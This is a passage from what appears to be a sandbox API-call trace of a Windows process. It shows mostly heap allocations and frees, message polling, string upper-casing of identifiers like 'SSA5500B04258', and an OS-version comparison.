lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.267] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.267] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.267] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0161.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0161.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.268] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0161.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0161.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0161.269] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0161.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0161.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0161.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0161.269] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0161.269] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0161.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.270] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.271] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0161.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0161.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0161.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0161.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.271] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0161.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0161.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0161.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0161.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0161.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0161.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.273] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0161.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.273] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0161.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0161.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0161.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0161.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0161.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0161.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0161.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0161.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0161.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.275] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.275] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0161.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.276] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0161.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0161.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0161.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.276] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0161.277] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0161.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0161.277] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0161.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0161.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0161.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0161.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 